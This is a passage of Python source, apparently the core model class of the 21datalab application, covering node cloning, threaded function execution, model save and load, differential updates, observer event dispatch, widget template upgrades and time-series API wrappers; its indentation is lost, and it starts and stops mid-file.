grandChildren = self.get_children_dict(childId)
if grandChildren != {}:
self.__clone_children(childId,cloneId)
def __clone_referencer_targets(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
childIds = self.get_node_info(sourcePath)["children"]
while childIds:
id = childIds.pop()
info = self.get_node_info(id)
if info["type"]=="referencer":
newreferencer = self.get_browse_path(id).replace(sourcePath, destPath)
#now check: if the referencers points to something inside, we do the same but in the target root, else we take it as it is
for targetId in info["forwardRefs"]:
targetPath = self.get_browse_path(targetId)
newTargetPath = targetPath.replace(sourcePath,destPath)# if not found, we get it unchanged
self.add_forward_refs(newreferencer,[newTargetPath])
childIds.extend(info["children"])
def clone(self,desc):
"""
clone a node and all its subnodes (a whole branch)
we will create all nodes which existed in the source branch, for the referencers we use this stategy:
references pointing to a node under the source branch will be translated to references in the target branch
poining to the corresponding new node in the target branch
references pointing to outside the source branch will also be created in the cloned branch pointing to
the same target
Args:
desc: the source node descriptor
"""
sourcePath = self.get_browse_path(desc)
if not sourcePath:
return False
targetPath = sourcePath+"_"+getRandomId()
sourceInfo = self.get_node_info(desc)
transferRoot = self.create_node_from_path(targetPath,properties={"type":sourceInfo["type"]})
#now iterate over the nodes and children and create the same nodes
self.__clone_children(desc,transferRoot)
self.__clone_referencer_targets(sourcePath,transferRoot)
return True
def execute_synchronous(self,id):
"""
execute a function synchronously here (this can be useful when executing a function within another
"""
return self.__execution_thread(id)
def __execution_thread(self,id):
"""
the thread function to execute functions
it currently uses the global lock so it will lock out any other work on the model during execution
all inputs and outputs are found in the model
we also set the status and result from here, not needed to do that in the function
Args:
id: the node id of the function to be executed or the dict for an object call
"""
try:
if type(id) is str:
if self.model[id]["type"] == "function":
isFunction = True
else:
isFunction = False
with self.lock:
if isFunction:
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
# must reload the module
functionName = self.model[id]["functionPointer"]
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module, functionName.split('.', 1).pop())
# now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
#check the function
functionName = self.model[id]["functionPointer"]
functionPointer = self.functions[functionName]['function']
self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
else:
functionPointer = id["functionPointer"]
functionName = functionPointer.__name__
parameter = id["parameter"]
id = id["id"] #for deeper down
#now set some controls
try:
node = self.get_node(id)
controlNode = node.get_child("control")
targetId = self.get_id("root.system.progress.targets")
if targetId:
if not self.get_node_info(targetId)["forwardRefs"]:
#we only hook us on the observer if free
self.disable_observers()
self.remove_forward_refs(targetId)
self.add_forward_refs(targetId,[controlNode.get_child("progress").get_id()])
self.enable_observers()
# we don't signal these things
self.disable_observers()
controlNode.get_child("status").set_value("running")
controlNode.get_child("result")#.set_value("pending")
if controlNode.get_child("progress").get_value()!=0:
#we set the control progress only if necessary, otherwise we can get interleaved event yields:
# the event queue always sends the first event of a kind, then flushes the queue and sends the same of a kind after a timeout
# so having this progress = 0 event too often is not a good idea: we could get an interleaved "0" during a 0.1 0.2 from a plug in
controlNode.get_child("progress").set_value(0) #progress will always be observed even in disable observers
#controlNode.get_child("signal").set_value("nosignal")
startTime = datetime.datetime.now()
controlNode.get_child("lastStartTime").set_value(startTime.isoformat())
self.enable_observers()
except:
self.logger.error("error during execution preparation, this can be critical, maybe disabled observers")
self.log_error()
pass
# model lock open: we execute without model lock
if isFunction:
result = functionPointer(node) # this is the actual execution
else:
result = functionPointer(parameter)
#now we are back, set the status to finished
duration = (datetime.datetime.now()-startTime).total_seconds()
with self.lock:
# this is a bit dangerous, maybe the node is not there anymore?, so the
# inner functions calls of node.xx() will return nothing, so we try, catch
try:
self.logger.debug(f"function {functionName} execution completed in {duration} ")
self.disable_observers() # we don't signal these
controlNode.get_child("lastExecutionDuration").set_value(duration)
controlNode.get_child("status").set_value("finished")
self.enable_observers()
controlExecutionCounter = controlNode.get_child("executionCounter")
controlExecutionCounter.set_value(controlExecutionCounter.get_value() + 1)
controlProgress = controlNode.get_child("progress")
if controlProgress.get_value()!=0:
#reset the progress back to zero
#only set it if it was set by the function, otherwise we save a progree event
controlProgress.set_value(0)
#now unhook the observer of our progress
targetId = self.get_id("root.system.progress.targets")
if targetId:
#we have a system observer for progress
forwards = self.get_node_info(targetId)["forwardRefs"]
if forwards and forwards[0] == controlNode.get_child("progress").get_id():
#the observer is watching us, remove it
self.logger.debug("remove "+self.get_browse_path(controlNode.get_child("progress").get_id()))
self.remove_forward_refs(targetId)
#self.notify_observers([controlExecutionCounter.get_id(),controlProgress.get_id()],"value")
if not isFunction:
result = True # for execution of member function we don't have a general return code
if result == True:
controlNode.get_child("result").set_value("ok")
self.publish_status_msg("result of " + str(functionName) + ": " + controlNode.get_child("result").get_value())
else:
if controlNode.get_child("result").get_value() == "pending":
#if the functions hasn't set anything else
controlNode.get_child("result").set_value("error")
#also publish this result
self.publish_status_msg("error in " + str(functionName) + ": " + controlNode.get_child("result").get_value())
self.publish_event("system.function.complete",id,{"result":controlNode.get_child("result").get_value(),"progress":controlNode.get_child("progress").get_value()})
# except:
# self.logger.error("problem setting results from execution of #"+str(id))
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread, id" +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
#unhook the progress bar
targetId = self.get_id("root.system.progress.targets")
if targetId:
#we have a system observer for progress
forwards = self.get_node_info(targetId)["forwardRefs"]
if forwards and forwards[0] == controlNode.get_child("progress").get_id():
#the observer is watching us, remove it
self.logger.debug("remove "+self.get_browse_path(controlNode.get_child("progress").get_id()))
self.remove_forward_refs(targetId)
pass
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread level outer, id " +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
controlNode.get_child("status").set_value("interrupted")
controlNode.get_child("result").set_value("error:"+errorString)
controlNode.get_child("progress").set_value(0)
self.publish_status_msg("error in "+str(functionName)+": "+errorString)
#unhook the progress bar
targetId = self.get_id("root.system.progress.targets")
if targetId:
#we have a system observer for progress
forwards = self.get_node_info(targetId)["forwardRefs"]
if forwards and forwards[0] == controlNode.get_child("progress").get_id():
#the observer is watching us, remove it
self.logger.debug("remove "+self.get_browse_path(controlNode.get_child("progress").get_id()))
self.remove_forward_refs(targetId)
return
def get_error(self):
s=f"{sys.exc_info()[1]}, {traceback.format_exc()}"
return s
def log_error(self):
self.logger.error(self.get_error())
def show(self):
"""
show the current model as a ascii tree on he console
"""
with self.lock:
self.__show_subtree("1")
def save_model(self):
return self.save(self.currentModelName,includeData=False)
# save model and data to files
def save(self, fileName, includeData = True):
"""
save the model to disk, save the tables separately
the model file will be saves as ./models/fileName.model.json and the tables will be saved under
./models/filename.tablePath.npy
Args:
fileName to store it under, please don't give extensions
includeData : if set to False, we DONT store the values of node types tables or files to disk
"""
self.logger.debug(f"save model as {fileName} with data {includeData}")
self.publish_status_msg(f"saving model {fileName}...")
with self.lock:
try:
m = self.get_model_for_web() # leave out the tables
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
if includeData:
self.ts.save(os.path.join(model_directory, model_filename))
f = open(os.path.join(model_directory, model_filename)+ ".model.json", "w")
f.write(json.dumps(m, indent=4))
f.close()
self.currentModelName = fileName
self.publish_status_msg(f"model {fileName} saved.")
return True
except Exception as e:
self.logger.error("problem sving "+str(e))
self.publish_status_msg(f"saving model {fileName} error")
return False
def move(self, nodeList, newParent, newIndex=None):
"""
move a list of nodes under a new Parent on the child position new Index
if the newParent is a referencer, we are creating references instead and keep the nodes where they are
Args:
nodeList [string]: a list of node descriptors of the nodes to move, scalar is also allowed
NewParent [string] a node descriptor for the new parent under which the nodes should appear
new Index int : the position on the children of newParent where the new nodes should appear
Returns:
True
"""
with self.lock:
if not type(nodeList) is list:
nodeList = [nodeList]
nodeIds = self.get_id(nodeList)
parentId = self.get_id(newParent)
if not parentId: return False
#check the special case that the parent is a referencer:
if self.model[parentId]["type"] == "referencer":
self.add_forward_refs(parentId,nodeIds)
self.logger.info("moves nodes as references "+ parentId + str(nodeIds))
return True
#for all others, we start moving nodes
self.logger.debug(f"model.move():{nodeIds}=>{parentId}")
try:
for id in nodeIds:
if id == parentId or id == "1":
self.logger.error("cant move " +id + " to " + parentId)
continue
oldParent = self.model[id]["parent"]
self.model[oldParent]["children"].remove(id) # remove the child from the old parent
self.model[id]["parent"]=parentId
if newIndex:
self.model[parentId]["children"].insert(newIndex,id) # at specific index
else:
self.model[parentId]["children"].append(id) # at the end
self.__notify_observers(oldParent, "children")
self.__notify_observers(parentId, "children")
except Exception as ex:
self.logger.error(f"problem moving {nodeIds} to new parent {parentId} this is critical, the model can be messed up {ex}")
return True
def clean_ts_entries(self):
"""
remove timeseries data that has no node and remove nodes (timeseries that have no timeseries data
"""
self.logger.debug("clean_ts_entries(): check consistency of model and timeseries table..")
deleteNodes = []
for id, node in self.model.items():
if node["type"] == "timeseries":
info = self.ts.get_info(id)
if "not found" in info:
self.logger.info(f" {node['name']}: has no time series date entry in the ts table, remove node")
deleteNodes.append(id)
for id in deleteNodes:
self.delete_node(id)
deleteTs=[]
for id in self.ts.get_items():
if id not in self.model:
self.logger.info(f" timeseries data {id} has no corresponding node in model .. delete the ts-data")
self.ts.delete(id)
def reset_progress_observer(self):
targetId = self.get_id("root.system.progress.targets")
if targetId:
self.remove_forward_refs(targetId)
def load(self,fileName,includeData = True, update = False):
"""
replace the current model in memory with the model from disk
please give only a name without extensions
the filename must be in ./models
Args:
fileName(string) the name of the file without extension, we also accept a dict here: a list of nodes
includeData bool: if set to false, the values for tables and files will NOT be loaded
update : if set to true, auto correct missing entries in known templates
"""
result = False
self.logger.info(f"load {fileName}, includeData {includeData}")
with self.lock:
self.publish_status_msg(f"loading model {fileName}...")
self.disable_observers()
try:
if type(fileName) is str:
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
#if os.path.dirname(fileName)
f = open(os.path.join(model_directory, model_filename) + ".model.json","r")
model = json.loads(f.read())
self.model = model
f.close()
self.currentModelName = fileName
elif type(fileName) is dict:
self.model = copy.deepcopy(fileName) # take over the nodes
self.currentModelName = "fromNodes"
#now also load the tables
self.globalIdCounter = 0 #reset the counter and recover it further down
for nodeId in self.model:
if not self.idCreationHash:
#we only recover the counter if necessary
if int(nodeId)>self.globalIdCounter:
self.globalIdCounter = int(nodeId) # here, we recover the global id counter
if includeData:
if "version" in self.model["1"] and self.model["1"]["version"]>=0.1:
#new loader
self.ts.load(os.path.join(model_directory, model_filename))
else:
self.logger.debug("time series compatibility loader")
#we assume data in file and use the standard inmemory table storage
for nodeId in self.model:
if self.get_node_info(nodeId)["type"] == "table":
table = self.get_browse_path(nodeId)
data = numpy.load(os.path.join(model_directory, model_filename) + "." + table + ".npy")
#now find the time data, apply it to all variables
timeId=self.find_table_time_node(table)
ids = self.get_leaves_ids(table+".columns")
for id, column in zip(ids, data):
if id==timeId:
times = column
else:
self.ts.create(id)
self.set_properties({"type":"timeseries"},id)
self.ts.set(id,values=column)
for id in ids:
if id == timeId:
continue
self.ts.set(id,times=times)
self.clean_ts_entries() # make sure the model and ts table is consistent
self.reset_progress_observer()
self.instantiate_all_objects()
self.reset_all_objects()
self.enable_observers()
self.publish_status_msg(f"loading model {fileName} done.")
self.model["1"]["version"]=self.version #update the version
result = True
except Exception as e:
self.logger.error("problem loading"+str(e))
self.log_error()
self.publish_status_msg(f"loading model {fileName} error.")
self.enable_observers()
result = False
if update:
self.update() # automatically adjust all widgets and other known templates to the latest style
return result
def create_differential_handle(self, user = None):
"""
make a copy of the current model and keep it as copy, create a handle for it and return that handle
this new handle is at the same time the id of te new "user", all the following requests for differential updata
will be referred to this user id
Returns:
a hash handle for the current model
"""
with self.lock:
#newHandle = str(uuid.uuid4().hex) # make a new unique handle
newHandle = str(self.diffHandleCounter)
self.diffHandleCounter += 1
if not user:
#also create a new user
user = newHandle
self.differentialHandles[newHandle]= {
"user":user,
"model":self.get_model_for_web(),
"time": int(time.time()),
"updateCounter": self.modelUpdateCounter
}# make an entry by copying the whole model
return newHandle
def get_differential_update(self,oldHandle,newHandle=None):
"""
this function takes the copy of the model (hopefully) held under handle and compares it to the current model:
the differences are analyzed and returned, t
to avoid endless storage of old references, we have the deletin stategy: for every "user" we keep a max of
self.differentialHandlesMaxPerUser, if we have more, we delete the oldest
Args:
oldHandle (string): the unique id of the old version of the model
newHandle (string): the unique id of the new version to compare to, if not given, we take the current
and will automatically make a new entry for the current
delOld: if set, we remove the old entry from the memorized models with a one step delay
Returns (dict):
containing information about the changes between and old and new version of the model
key values:
"handle":(string): the handle under which we find the new version of the model
"newNodes": (dict) nodes which are new to the tree in the form Nodeid:{properties}
"deletedNodeIds": (list) list of node ids which have been deleted
"modifiedNodes": (dict) nodes which have changed properties: if so, we give the full updated node back
"""
with self.lock:
diff={"handle":None,"newNodes":{},"deletedNodeIds":[],"modifiedNodes":{}} # the response for web
if oldHandle not in self.differentialHandles:
return None # the old handle does not exist, we can't handle this request
if newHandle is None:
# this is the standard case, we generate the new handle now
user = self.differentialHandles[oldHandle]["user"]
# we make a quick check if the model has changed at all, if not we simply return the old handle
if self.differentialHandles[oldHandle]["updateCounter"] == self.modelUpdateCounter:
self.logger.debug("get_differential_update: shortcut for no changes")
diff["handle"] = oldHandle
return diff
newHandle = self.create_differential_handle(user=user) # this function also makes a copy of the current tree and puts it in the self.differential handles list
newModel = self.differentialHandles[newHandle]["model"]
else:
if newHandle in self.differentialHandles:
newModel = self.differentialHandles[newHandle]
else:
return None # the newhandle did not exist
oldModel = self.differentialHandles[oldHandle]["model"]
# delete strategy: for every "user" we track a maximum of self.differentialHandlesMaxPerUser
users={}
for handle,entry in self.differentialHandles.items():
user = entry["user"]
if user not in users:
users[user]={}
users[ user][ handle ] = entry["time"]
for user,entries in users.items():
if len(entries)> self.differentialHandlesMaxPerUser:
#must clean up history of that user, entries is a dict of handle:time
sortedKeys =[key for key, value in sorted(entries.items(), key=lambda item: item[1])]
removeKeys = sortedKeys[:-self.differentialHandlesMaxPerUser]
self.logger.debug("remove handle"+str(removeKeys)+" of user"+user)
for key in removeKeys:
del self.differentialHandles[key]
#find the changes between the models
for newNodeId in newModel:
if newNodeId not in oldModel:
#this node is not found in the old model, so it is new
diff["newNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
else:
#this node is in both models, check if there was a change insight the nodes
#for a deep comparison, serialize them
newNodeSerialized = json.dumps(newModel[newNodeId],sort_keys=True)
oldNodeSerialized = json.dumps(oldModel[newNodeId],sort_keys=True)
if newNodeSerialized != oldNodeSerialized:
#something is different, so return that node
diff["modifiedNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
#now check for deleted once, these appear in the old but not in the new
diff["deletedNodeIds"]=list(set(oldModel.keys())-set(newModel.keys()))
diff["handle"]=newHandle
return diff
def publish_status_msg(self, event):
"""
send out an event e.g. for status information
event to send looks like
event = { "id": 1123,
"event": "system.status"
"data:"{"nodeId":xx, "value":..,"function":... ...}
}
Args
event [string or dict]
"""
self.logger.debug(f"publish_status_msg ({event})")
self.modelUpdateCounter += 1
if type(event) is str:
#make sure the formatting is json compatible
event = event.replace("'",'"')# ' => "
event={"event":"system.status","data":{"text":event}}
event["id"]=self.modelUpdateCounter
for observerObject in self.observers:
observerObject.update(event)
def publish_event(self,event,desc=None,info=None):
"""
send an event out
Args
event [str] the event string
desc the node descriptor
info [dict] aditional field to send out
"""
self.logger.debug(f"publish_event {event} : {desc}, {info}")
data = {}
if desc:
id = self.get_id(desc)
if not id: return
data["id"] = id
data["browsePath"] = self.get_browse_path(id)
data.update(info)
event = {"event":event,"data":data}
for observerObject in self.observers:
observerObject.update(event)
def disable_observers(self):
self.lock_model()
#with self.lock:
self.disableObserverCounter += 1
#self.logger.debug(f"disable_observers() {self.disableObserverCounter}")
def enable_observers(self):
self.release_model()
if self.disableObserverCounter >0:
self.disableObserverCounter -=1
else:
self.logger.error("enable_observers without disable observers")
#self.logger.debug(f"enable_observers() {self.disableObserverCounter}")
def notify_observers(self, nodeIds, properties, eventInfo={}):
"""
public wrapper for __notify observser, only expert use!
"""
#self.logger.info(f"notify observses(), {str_lim(nodeIds,50)}, {properties}")
return self.__notify_observers(nodeIds,properties,eventInfo)
def get_referencers(self,descList,deepLevel = 0):
"""
get the references to this node via backtraversing the leaves algorithm
we look for parents through deepLevel levels and from there on we look back for referencers
deepLevel is the the level of extra parent level: 1 means the one more level, two means two extra level
Returns:
a list of referencers ids that point to the given descList nodes
"""
#convert all to nodes to ids
if type(descList) is not list:
descList = [descList]
startList = set([self.__get_id(node) for node in descList])
startList =set([node for node in startList if node]) #remove None and duplicates
referencers = set() #we collect the parents here and avoid duplicates
#in this first iteration we take the referencers pointing directly to the nodes or their parents
workList = startList.copy()
for level in range(deepLevel+1):
#from this level we take the backrefs
for id in workList:
referencers.update(self.model[id]["backRefs"])
#prepare parents for next round
parents=set()
for id in workList:
myParent=self.model[id]["parent"]
if myParent not in ["0","1"]: #root
parents.update([myParent]) #!use list to avoid break into chars
#now take the parents as currentList
workList = parents.copy()
if workList ==[]:
break #avoid turning cycles for nothing
#second step:
# now we take all final referencers and all referencers to those referencers with no limit
# (go back the leaves algorithm)
collectedReferencers = referencers.copy() # we take all we have so far
while True:
workList=set()
for id in referencers:
workList.update(self.model[id]["backRefs"])
collectedReferencers.update(workList)
if not workList:
break
else:
#one more round
referencers = workList.copy()
return list(collectedReferencers)
def __notify_observers(self, nodeIds, properties, eventInfo={} ):
"""
this function is called internally when nodes or properties have changed. Then, we look if any
observer has to be triggered
we also increase the counter and time on the root.observers.modelObserver
Args:
nodeId: the nodeIds where a change occurred
properties: the property or list of properties of the node that has changed
"""
#exception for the progress node
if type(properties) is not list:
properties = [properties]
if type(nodeIds) is not list:
nodeIds = [nodeIds]
if self.disableObserverCounter>0:
#only one exception: progress works always
mustReturn = True
with self.lock:
for nodeId in nodeIds:
if self.model[nodeId]["name"] == "progress":
mustReturn = False
break
if mustReturn:
#self.logger.info(f"__notify_observers disable return {nodeIds} {properties}")
return
with self.lock:
# this is for the tree updates, any change is taken
self.modelUpdateCounter = self.modelUpdateCounter + 1 #this is used by the diff update function and model copies
collectedEvents=[]
enableTree = self.get_node("root.system.enableTreeUpdateEvents")
if enableTree and enableTree.get_value()==False:
pass
else:
# Notify all observers about the tree update, this is a standard
event = {
"id": self.modelUpdateCounter,
"event": "tree.update",
"data": ""}
collectedEvents.append(event) # send later
names =[self.model[id]["name"] for id in nodeIds]
self.logger.debug(f"__notify_observers {len(nodeIds)} ids:{str_lim(names,100)}: {properties}")
triggeredObservers=[] # we use this to suppress multiple triggers of the same observer, the list holds the observerIds to be triggered
#p=utils.Profiling("__notify.iterate_nodes")
referencers = self.get_referencers(nodeIds,deepLevel=5)#deeplevel 5: nodes can be organized by the user in hierachy
nodeId = self.__get_id(nodeIds[0])#take the first for the event string,
#p.lap(f"get refs for {nodeId}")
self.logger.debug(f"__notify on {len(referencers)} referencers: {str_lim([self.get_browse_path(id) for id in referencers],200)}")
for id in referencers:
if self.model[id]["name"] == "targets" and self.model[self.model[id]["parent"]]["type"] == "observer":
# this referencers is an observer,
observerId = self.model[id]["parent"]
observer = self.get_children_dict(observerId)
# check if trigger
if observer["enabled"]["value"] == True:
#self.logger.debug(f"{self.model[nodeId]['name']} is targeted by observer {self.get_browse_path(observerId)}")
if observerId in triggeredObservers:
self.logger.debug(f"we have triggered the observer {self.get_browse_path(observerId)} in this call already, pass")
continue
#self.logger.debug(f"check properties to triggered the observer {self.get_browse_path(observerId)}")
#check if any of the observed properties matches
propertyMatch = False
for property in properties:
if property in observer["properties"]["value"]:
propertyMatch=True
break
if not propertyMatch:
#self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} no property match ")
pass
else:
self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} for change in {property}")
self.model[observer["triggerCounter"]["id"]]["value"] = self.model[observer["triggerCounter"]["id"]]["value"]+1
self.model[observer["lastTriggerTime"]["id"]]["value"] = datetime.datetime.now().isoformat()
for funcNodeId in self.get_leaves_ids(observer["onTriggerFunction"]["id"]):
self.logger.debug(f"execute ontrigger function {funcNodeId}")
self.execute_function(funcNodeId)
if "triggerSourceId" in observer:
self.model[observer["triggerSourceId"]["id"]]["value"] = nodeId
if observer["hasEvent"]["value"] == True:
#self.logger.debug(f"send event {observer['eventString']['value']}")
#also send the real event
#self.modelUpdateCounter = self.modelUpdateCounter+1
event = {
"id": self.modelUpdateCounter,
"event": observer["eventString"]["value"],
"data": {"nodeId":observerId,"sourceId":nodeId,"sourcePath":self.get_browse_path(nodeId)}}
#we directly put some changed properties in the event
if self.model[nodeId]["type"] not in ["column","file","timeseries"]:
event["data"]["value"]=self.model[nodeId]["value"]
for prop in properties:
if prop in ["children","forwardRefs"]:
event["data"][prop]=self.model[nodeId][prop]
#some special handling
try:
if event["event"] == "system.progress":
progressNode = self.get_node(self.get_leaves_ids("root.system.progress.targets")[0])
event["data"]["value"] = progressNode.get_value()
event["data"]["function"] = progressNode.get_parent().get_parent().get_browse_path()
else:
eventNode = self.get_node(observerId)
extraInfoNode = eventNode.get_child("eventData")
if extraInfoNode:
extraInfo = extraInfoNode.get_value()
if type(extraInfo) is not dict:
extraInfo={"info":extraInfo}
event["data"].update(extraInfo)
if eventInfo:
event["data"]["_eventInfo"]=eventInfo #put this only if we have info
except Exception as ex:
self.logger.error(f"error getting extra info for event {ex}, {sys.exc_info()[0]}")
#for all other events, take the event data if there is one (as json)
self.logger.debug(f"generate event {event}")
collectedEvents.append(event)
triggeredObservers.append(observerId)# next time, we don't trigger
#p.lap("complete backrefs {nodeId}, {backrefs}")
#self.logger.debug(p)
#self.logger.debug("now send the events")
#event = copy.deepcopy(event)
for event in collectedEvents:
for observerObject in self.observers:
observerObject.update(event)
self.logger.debug(f"done sending {len(collectedEvents)} events")
def create_observer(self):
# Instantiate a new observer
observer = Observer(self)
# attach it to the model
self.attach_observer(observer)
# return the observer
return observer
def attach_observer(self, observer):
# Add a new observer
self.logger.debug(f"Adding new observer: {id(observer)}")
with self.lock:
self.observers.append(observer)
def detach_observer(self, observer):
with self.lock:
try:
self.observers.remove(observer)
self.logger.debug(f"Removing observer: {id(observer)}")
except ValueError:
self.logger.exception("Trying to remove an observer which doesn't exist in the list of observers.")
def set_column_len(self,nodeDescriptor,newLen):
"""
adjust the len of a colum, extension are inf-padded,
Args: nodeDescriptor: the node
newLen (int) the new lenth of the column
Returns:
the new value set or none if problem
"""
with self.lock:
id = self.get_id(nodeDescriptor)
if not id: return None
if self.model[id]["type"] != "column":
self.logger.error("set_column_len: not a column")
return None
#now make the adjustments
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = numpy.full(newLen, numpy.nan)
else:
#is already an array
if len(self.model[id]['value']) == newLen:
#nothing to do
pass
if len(self.model[id]['value']) > newLen:
self.model[id]['value'] = self.model[id]['value'][0:newLen]
elif len(self.model[id]['value']) < newLen:
self.model[id]['value'] = numpy.append(self.model[id]['value'], numpy.full(dataLen-len(self.model[id]['value']), numpy.nan))
else:
#same len
pass
return newLen
def get_upload_folder_files(self, matchFilter=None, blackList = []):
"""
Args:
fileNameMatch: a string that must be contained in the files to deliver
blackList: a list of filenames which should not be delivered
Returns list of files with absolute file names, list of files with fileNames
"""
full_path = os.path.realpath(__file__) # returns a string representing the canonical path, argument file is a file system path
path, filename = os.path.split(full_path)
folder = path+r'\upload'
absFileNames = []
foundFileNames = []
#now iterate the uploaded files
fileNames = os.listdir(folder)
for idx,fileName in enumerate(fileNames):
if matchFilter:
if matchFilter not in fileName:
continue # this file will be ignored
if fileName in blackList:
continue
foundFileNames.append(fileName)
absFileNames = [folder+"\\"+fileName for fileName in foundFileNames]
return foundFileNames,absFileNames
def get_upload_folder_path(self):
full_path = os.path.realpath(__file__) # returns a string representing the canonical path, argument file is a file system path
path, filename = os.path.split(full_path)
folder = path + r'\upload'
return folder
def update(self):
"""
update all known widgets to the latest template including complex backward compatibility changes
:return:
"""
self.logger.info("update() running...")
self.disable_observers()
try:
# the ts widgets:
# now go throught the widget and update all according the template
# now find all type widget
newNodes = {}
helperModel = Model()
helperModel.disable_observers()
helperModel.create_template_from_path("root.widget", self.get_templates()['templates.timeseriesWidget'])
widgets = []
for id, props in self.model.items():
if props["type"] == "widget":
widgetObject = self.get_node(id)
if widgetObject.get_child("widgetType").get_value() == "timeSeriesWidget":
widgets.append(id)
self.logger.debug(f"update():found widget {widgetObject.get_browse_path()}")
for id in widgets:
path = self.get_browse_path(id)
mirrorBefore = self.get_branch_pretty(path)
self.create_template_from_path(path,self.get_templates()['templates.timeseriesWidget']) # this will create all nodes which are not there yet
# now make specific updates e.g. linking of referencers, update of list to dicts etc.
# if colors is a list: make a dict out of it
colors = self.get_value(f"{id}.hasAnnotation.colors")
tags = self.get_value(f"{id}.hasAnnotation.tags")
if type(colors) is list:
colors = {v:{"color":colors[idx],"pattern":None} for idx,v in enumerate(tags)}
self.logger.debug(f"update(): set value{id}.hasAnnotation.colors := {colors} ")
self.set_value(f"{id}.hasAnnotation.colors",colors)
if not "visibleTags" in mirrorBefore["hasAnnotation"] or (self.get_value(f"{id}.hasAnnotation.visibleTags") != mirrorBefore["hasAnnotation"]["visibleTags"][".properties"]["value"]):
#it is different or new, so we created it now
visibleTags = {tag:True for tag in tags}
#make sure that from the colors, we take them as well
updateVisibleTags = {tag:True for tag in colors}
visibleTags.update(updateVisibleTags)
self.set_value(f"{id}.hasAnnotation.visibleTags",visibleTags)
self.logger.debug(f"update(): set value{id}.visibleTagss := {visibleTags} ")
#make sure the hasAnnotation.annotations referencer points to newannotations as well
self.add_forward_refs(f"{id}.hasAnnotation.annotations",[f"{id}.hasAnnotation.newAnnotations"],allowDuplicates=False)
#now make sure the observers have at least the required properties enabled
widget = self.get_node(id)
helperRoot = helperModel.get_node("root.widget")
template = self.get_templates()['templates.timeseriesWidget']
children = helperRoot.get_children(3)
print(f"2 level children {[node.get_browse_path() for node in children]}")
for child in helperRoot.get_children():
if child.get_properties()["type"] == "observer":
widgetNode = widget.get_child(child.get_name()).get_child("properties")
helperNode = child.get_child("properties")
for prop in helperNode.get_value():
current = widgetNode.get_value()
if prop not in current:
current.append(prop)
widgetNode.set_value(current)
for child in helperRoot.get_children(3):
if child.get_properties()["type"] == "referencer":
self.logger.debug(f"found referencer {child.get_name()}")
# now adjust the references of new nodes and of the ones that were there
targets = child.get_properties()["forwardRefs"]
if targets:
targets = [helperModel.get_browse_path(ref) for ref in targets]
requiredTargets = [widget.get_browse_path()+"."+".".join(ref.split(".")[2:]) for ref in targets]
self.logger.debug(f"required targets {requiredTargets}")
#now check in the model
widgetNodePath = widget.get_browse_path()+ child.get_browse_path()[len(helperRoot.get_browse_path()):]
widgetNode = self.get_node(widgetNodePath)
#now check if we have them
targetPaths = [tNode.get_browse_path() for tNode in widgetNode.get_targets()]
for target in requiredTargets:
if target not in targetPaths:
self.logger.debug(f"adding ref {widgetNode.get_browse_path()} => {target}")
self.add_forward_refs(widgetNode.get_id(),[target])
#now the system progress observer
if not self.get_node("root.system.progress"):
self.create_template_from_path("root.system.progress",self.get_templates()['system.observer'])
self.set_value("root.system.progress.hasEvent",True)
self.set_value("root.system.progress.eventString","system.progress")
self.set_value("root.system.progress.properties",["value"])
self.set_value("root.system.progress.enabled",True)
except Exception as ex:
self.logger.error(f" {ex} , {sys.exc_info()[0]}")
helperModel.delete()
helperModel.delete()
self.enable_observers()
# ########################################
# time series api
def time_series_create(self,desc,allocSize = None):
id = self.get_id(desc)
return self.ts.create(id,allocSize = allocSize)
def time_series_delete(self,desc):
id = self.get_id(desc)
return self.ts.delete(id)
def time_series_insert(self, desc, values=None, times=None, allowDuplicates = False):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.insert(id,values, times,allowDuplicates=allowDuplicates)
self.__notify_observers(id, "value")
return result
def time_series_append(self, desc, values=None, times=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.append(id,values, times)
self.__notify_observers(id, "value")
return result
def time_series_delete_area(self,desc,start=None,end=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.delete_area(id,start=start,end=end)
self.__notify_observers(id, "value")
return result
def time_series_merge(self, desc, values = None, times = None):
id = self.get_id(desc)
if not id in self.model:
return False
return self.ts.merge(id,values=values,times=times)
def time_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
if self.lock:
result = self.ts.set(id,values=values,times=times)
self.__notify_observers(id, "value")
return result
def time_series_get_table(self,
variables,
tableDescriptor = None,
start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None,
copy=True,
includeAllNan=False):
"""
